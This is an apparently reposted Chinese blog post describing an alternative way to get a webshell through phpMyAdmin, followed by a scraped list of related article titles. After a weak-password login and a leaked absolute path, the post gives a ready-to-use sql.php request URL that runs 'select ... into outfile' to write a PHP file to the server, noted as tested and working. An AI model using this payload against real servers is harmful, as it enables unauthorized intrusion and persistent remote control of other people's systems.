发现了个PHPMYADMIN 结果弱口令登陆进去 爆出绝对路径 然后执行SQL语句发现导出SHELL的时候却发现缺少了import.php这个文件 结果没办法执行MYSQL语句! 然后本地测试了下 发现另外的方法

==========================================

phpMyAdmin/sql.php?db=test&table=a&printview=1&sql_query=select%20cmd%20from+a%20into%20outfile%20'E:\\test1.php';&display_text=F&token=dc49fb24f86a6dc2b996b5d4211cccb4

==========================================

樱花浪子注:测试已OK

转载于:https://blog.51cto.com/obnus/503653

phpmyadmin另类拿shell相关推荐

  1. YXcms之利用phpMyAdmin拿shell

    前些天大哥们在学校内网搭了这个YXcms靶场,记录一下这次测试过程的一些方法感受,分享一下. 首先信息收集一波,不管拿到什么站点,第一件要做的事就是信息收集,收集越多的信息,那拿下这个站点的成功率也就 ...

  2. phpMyAdmin 常见漏洞利用记录

    目录 简介 phpmyadmin版本信息获取 phpmyadmin密码爆破 phpmyadmin文件写入 phpmyadmin日志写shell phpmyadmin版本漏洞 phpmyadmin 2. ...

  3. 爆路径写后门拿shell的一些姿势

    [PhpMyAdmin后台拿Shell] CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.` ...

  4. kali扫描内网ip_来,我们聊聊内网渗透!

    文章来源:Admin Team 0x00 前言 前段时间再看 metasploit 和白帽子讲 Web 安全,就一直想自己搭个从 Web 端渗透进入内网的环境玩一下,不过因为不太懂计网的知识,拓扑图也 ...

  5. ubuntu mysql的穷_Ubuntu安装配置Mysql

    三种安装方式: 1. 从网上安装 sudo apt-get install mysql-server.装完已经自动配置好环境变量,可以直接使用mysql的命令. 注:建议将/etc/apt/sourc ...

  6. ubuntu中mysql操作_uBuntu下安装MySql,及mySql操作!

    1. 从网上安装 sudo apt-get install mysql-server.装完已经自动配置好环境变量,可以直接使用mysql的命令. 注:建议将/etc/apt/source.list中的 ...

  7. Ubuntu安装配置Mysql

    http://www.cnblogs.com/wuhou/archive/2008/09/28/1301071.html 三种安装方式: 1. 从网上安装 sudo apt-get install m ...

  8. [转载]Ubuntu安装配置Mysql

    http://www.cnblogs.com/wuhou/archive/2008/09/28/1301071.html 三种安装方式: 1. 从网上安装 sudo apt-get install m ...

  9. mysql10038_navicat for mysql (10038)如何解决

    1.授权(youpassword修改为你的密码) #本机登陆mysql: $:mysql -u root -p #改变数据库: mysql>use mysql; #从所有主机: mysql> ...

最新文章

  1. 第1期 | IOST开发者激励计划任务更新
  2. usb serial for android
  3. 检索数据_3_查询满足某个条件行
  4. 再见了微服务,DDD已成气候!
  5. 环形均分纸牌问题(中位数)
  6. linux 下oracle基于raw扩充表空间步骤
  7. 卷积法求解系统的零状态响应_信号与系统复习(2013.6)
  8. 1009 Product of Polynomials (25)(25 分)
  9. deepin linux下解决Qt搜狗输入法无法输入中文
  10. 智能一代云平台(九):EclipseLink返回Object转为实体的分析
  11. (8)Powershell中变量的定义和使用
  12. docker安装带管理界面的rabbitmq
  13. Apache代理Tomcat实现session共享构建网上商城系统
  14. 《指针的编程艺术(第二版)》一第三章 指针与数组3.1 指针与一维数组
  15. Java读取文件的四种方式
  16. 计算机应用有关的论文,关于计算机应用毕业论文范文精选
  17. WPS mac怎么取消自动首字母大写
  18. Android神器:Xposed框架
  19. 30条html代码编写规范
  20. python读取文件路径报invalid_Python: 目录名无效怎么办?

热门文章

  1. opencv 修改图像数值_opencv 修改图像数值_Python中使用OpenCV读取像素
  2. win10商店打不开_科技资讯:Win10系统电脑的应用商店老是打不开还闪退怎么办
  3. JavaScript 数据拷贝
  4. iOS 直播专题6-流媒体服务器
  5. python 虚拟现实_虚拟现实 | MOOC中国 - 慕课改变你,你改变世界
  6. ant 修改组件默认样式属性
  7. 【系列】EOS开发3 EOS提供的程序和工具
  8. 如何用Python批量提取PDF文本内容?
  9. 用Ajax请求服务器的图片,并显示在浏览器中(转)
  10. 修改centos7的网卡名